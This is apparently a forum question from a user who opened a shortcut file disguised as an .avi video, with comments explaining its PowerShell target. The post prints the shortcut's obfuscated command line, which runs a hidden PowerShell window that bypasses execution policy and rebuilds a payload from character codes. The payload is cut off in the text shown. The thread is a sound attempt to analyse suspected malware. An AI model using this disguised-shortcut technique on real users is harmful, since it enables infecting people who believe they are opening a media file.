I got a file that was .avi at the fist glance, but then I found out that in fact this is a .lnk file, but it was too late.
And the target element attribute of that file is
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82
The starting point is: %SYSTEMROOT%\System32\WindowsPowerShell\v1.0
I created String out of following ASCII codes and it seems that it is a BASE64 format of Hallo World!. It seems very confusing to me as I couldn't find NoPr, Wind and eXEc parameters anywhere in the docs of Powershell, additionaly for some reason the file had size of 700MB until I removed .avi value from file description field.
Do you know what this file could try to do?
I couldn't fin NoPr, Wind and eXEc- Powershell allows you to abbreviate arguments when there is no ambiguity. nopr = NoProfile, wind = WindowStyle, eXEc = ExecutionPolicy, ByP = Bypass. It does seem like potentially malware, if you don't know where it came from. https://docs.microsoft.com/en-us/powershell/scripting/core-powershell/console/powershell.exe-command-line-help?view=powershell-6 – Zoredache Nov 05 '18 at 18:05-EncodedCommand,-Command, or similar I don't see how it can execute anything. – user Nov 05 '18 at 19:43